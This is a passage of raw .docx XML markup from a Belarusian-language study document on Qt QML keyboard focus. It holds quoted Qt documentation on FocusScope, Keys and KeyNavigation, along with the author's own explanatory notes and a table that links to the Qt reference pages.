          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB23A2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB23A2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2272" w:history="1">
        <w:r w:rsidRPr="00AB23A2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>GridView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AB23A2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, behave in a similar manner to allow key handling in their respective delegates</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRDefault="00887731" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00252BF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Не да канца зразумеў значэнне гэтага тыпа… </w:t>
      </w:r>
      <w:r w:rsidR="00252BF3" w:rsidRPr="00252BF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Наступная задача для мяне пакуль што не вырашана, акрамя як праз ланцужок паведамленняў: як запусціць дзве анімацыі пры націсканні адной кнопкі?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00252BF3" w:rsidRPr="00B54AE2" w:rsidRDefault="00252BF3" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Я перачытаў пра </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FocusScope</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> і зразумеў. У прыкладзе, што паказвалі спачатку, праблема была наступнай. У прыватным тыпе, створаным у прыватным </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> файле, заўжды фокус усталёўваецца ў праўду. Аднак калі мы ствараем два аб’екты прыватнага тыпу ў іншым кантэксце, устанаўліваючы толькі для першага фокус = праўда, мы можам не падазраваць, што і ў другім ён таксама з’яўляецца праўдай. Так што фокус аказваецца на тыпе, пра які мы не падазраем. Калі ж мы абрамляем гэты тып у </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FocuesScope</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>, то мы ў любым кантэксце можам кіраваць тым, на якім элеменце знаходзіцца фокус.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B54AE2" w:rsidRPr="00B54AE2" w:rsidRDefault="00B54AE2" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>У дургім прыкладзе я замяніў клавішу ретурн на клавішц 1, бо былі праблемы. Там сітуацыя такая. Калі дэлегат абвяшчаецца як фокусСкоуп, то пэўныя маніпуляцыі з ім не ўплываюць не перавод фокуса на цяперашні элемент спіса. Дапусцім, што ў прылажэнні ёсць іншы элемент, які мае фокус. Калі карыстальнік выяўна не перавядзе курсор на спіс, але спіс пэўным чынам зменіцца, напрыклад, калі ён дынамічна абнаўляецца ў фонавым рэжыме, то калі б не было тыпа фокусСкоуп, то фокус пастаянна пераводзіўся бы на спіс.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRDefault="0034282A" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00252BF3" w:rsidRPr="007945B6" w:rsidRDefault="00252BF3" w:rsidP="00252BF3">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1913" w:name="_Toc483000944"/>
      <w:bookmarkStart w:id="1914" w:name="_Toc483003935"/>
      <w:bookmarkStart w:id="1915" w:name="_Toc483604287"/>
      <w:bookmarkStart w:id="1916" w:name="_Toc483605507"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Тыпы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1913"/>
      <w:bookmarkEnd w:id="1914"/>
      <w:bookmarkEnd w:id="1915"/>
      <w:bookmarkEnd w:id="1916"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="11625" w:type="dxa"/>
        <w:tblInd w:w="-14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7938"/>
        <w:gridCol w:w="1985"/>
      </w:tblGrid>
      <w:tr w:rsidR="00252BF3" w:rsidRPr="00763692" w:rsidTr="00B54AE2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00252BF3" w:rsidRPr="007945B6" w:rsidRDefault="00252BF3" w:rsidP="00B54AE2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007945B6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t>Тып</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00252BF3" w:rsidRPr="007945B6" w:rsidRDefault="00252BF3" w:rsidP="00B54AE2">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007945B6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t>апісанне</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00252BF3" w:rsidRPr="007945B6" w:rsidRDefault="00252BF3" w:rsidP="00B54AE2">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007945B6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00252BF3" w:rsidRPr="002230B8" w:rsidTr="00B54AE2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00252BF3" w:rsidRPr="00252BF3" w:rsidRDefault="00252BF3" w:rsidP="00B54AE2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>FocusScope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00252BF3" w:rsidRPr="00252BF3" w:rsidRDefault="00252BF3" w:rsidP="00B54AE2">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00252BF3">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Focus scopes </w:t>
            </w:r>
            <w:r w:rsidRPr="00252BF3">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>assist in keyboard focus handling</w:t>
            </w:r>
            <w:r w:rsidRPr="00252BF3">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> when building reusable QML components. All the details are covered in the </w:t>
            </w:r>
            <w:hyperlink r:id="rId2273" w:history="1">
              <w:r w:rsidRPr="00252BF3">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>keyboard focus documentation</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00252BF3">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00252BF3" w:rsidRPr="00252BF3" w:rsidRDefault="00490E7E" w:rsidP="00B54AE2">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2274" w:anchor="details" w:history="1">
              <w:r w:rsidR="00252BF3" w:rsidRPr="000B77C6">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:t>http://doc.qt.io/qt-5/qml-qtquick-focusscope.html#details</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00252BF3">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00252BF3" w:rsidRPr="002230B8" w:rsidTr="00B54AE2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00252BF3" w:rsidRPr="00B54AE2" w:rsidRDefault="00B54AE2" w:rsidP="00B54AE2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00252BF3" w:rsidRDefault="00B54AE2" w:rsidP="00B54AE2">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B54AE2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Provides </w:t>
            </w:r>
            <w:r w:rsidRPr="00B54AE2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>key handling to Items</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B54AE2" w:rsidRDefault="00B54AE2" w:rsidP="00B54AE2">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B54AE2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">All </w:t>
            </w:r>
            <w:r w:rsidRPr="00B54AE2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>visual primitives support key handling via the Keys attached property</w:t>
            </w:r>
            <w:r w:rsidRPr="00B54AE2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>. Keys can be handled via the onPressed and onReleased signal properties.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B54AE2" w:rsidRPr="00B54AE2" w:rsidRDefault="00B54AE2" w:rsidP="00B54AE2">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>…</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00252BF3" w:rsidRPr="00B54AE2" w:rsidRDefault="00490E7E" w:rsidP="00B54AE2">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2275" w:history="1">
              <w:r w:rsidR="00B54AE2" w:rsidRPr="000B77C6">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>http://doc.qt.io/qt-5/qml-qtquick-keys.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00B54AE2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00252BF3" w:rsidRPr="002230B8" w:rsidTr="00B54AE2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00252BF3" w:rsidRPr="007945B6" w:rsidRDefault="00B54AE2" w:rsidP="00B54AE2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>KeyNavigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00252BF3" w:rsidRDefault="00B54AE2" w:rsidP="00B54AE2">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B54AE2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Supports </w:t>
            </w:r>
            <w:r w:rsidRPr="00B54AE2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>key navigation by arrow keys</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B54AE2" w:rsidRDefault="00B54AE2" w:rsidP="00B54AE2">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B54AE2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Key-based user interfaces commonly </w:t>
            </w:r>
            <w:r w:rsidRPr="00B54AE2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>allow the use of arrow keys to navigate between focusable items</w:t>
            </w:r>
            <w:r w:rsidRPr="00B54AE2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>. The</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId2276" w:history="1">
              <w:r w:rsidRPr="00B54AE2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>KeyNavigation</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B54AE2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>attached property enables this behavior by providing a convenient way to specify the item that should gain focus when an arrow or tab key is pressed.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B54AE2" w:rsidRDefault="00B54AE2" w:rsidP="00B54AE2">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t xml:space="preserve">… </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B54AE2" w:rsidRPr="00B54AE2" w:rsidRDefault="00B54AE2" w:rsidP="00B54AE2">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
